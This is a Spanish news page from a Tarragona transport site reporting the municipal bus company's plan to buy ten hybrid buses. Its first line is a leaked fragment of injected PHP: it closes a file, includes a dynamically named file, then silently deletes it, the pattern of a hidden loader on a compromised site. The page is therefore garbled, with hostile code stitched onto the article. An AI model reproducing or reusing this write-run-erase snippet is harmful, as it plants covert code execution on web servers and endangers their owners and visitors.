");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La EMT de Tarragona renovará la flota con la adquisición de diez autobuses híbridos
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

La EMT de Tarragona renovará la flota con la adquisición de diez autobuses híbridos (18/02/2021)

La Empresa Municipal de Transportes (EMT) ha iniciado el proceso mediante el cual se comprarán diez nuevos autobuses híbridos este año 2021. Así lo ha anunciado Jordi Fortuny, presidente de la EMT, quien ha destacado que "esta adquisición forma parte del plan de renovación de flota ya previsto en la Empresa Municipal de Transportes ".

Se inicia ahora el proceso para la compra y el mantenimiento de diez autobuses nuevos que se incorporarán a la flota a fin de retirar los más antiguos y, al mismo tiempo, también más contaminantes.

"Queremos autobuses limpios. Trabajamos intensamente para que en el futuro todos los vehículos funcionen con hidrógeno y, por tanto, las emisiones sean cero. La incorporación de los autobuses híbridos es, pues, un paso intermedio que debe ayudarnos a ser más sostenibles antes de conseguir ser totalmente verdes y ecológicos ", añade el presidente de la EMT.

La operación tiene un presupuesto previsto de más de tres millones de euros y se prevé que la incorporación de los primeros autobuses híbridos se haga efectiva durante este año 2021.

El proyecto se llevará al consejo de administración de la EMT previsto para el próximo mes de marzo.

"Con esta medida", concluye Jordi Fortuny, "la EMT hace un esfuerzo, a pesar del contexto, para disponer de un servicio público esencial en las mejores condiciones posibles".

Fuente: Ayuntamiento de Tarragona

La EMT de Tarragona renovará la flota con la adquisición de diez autobuses híbridos

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona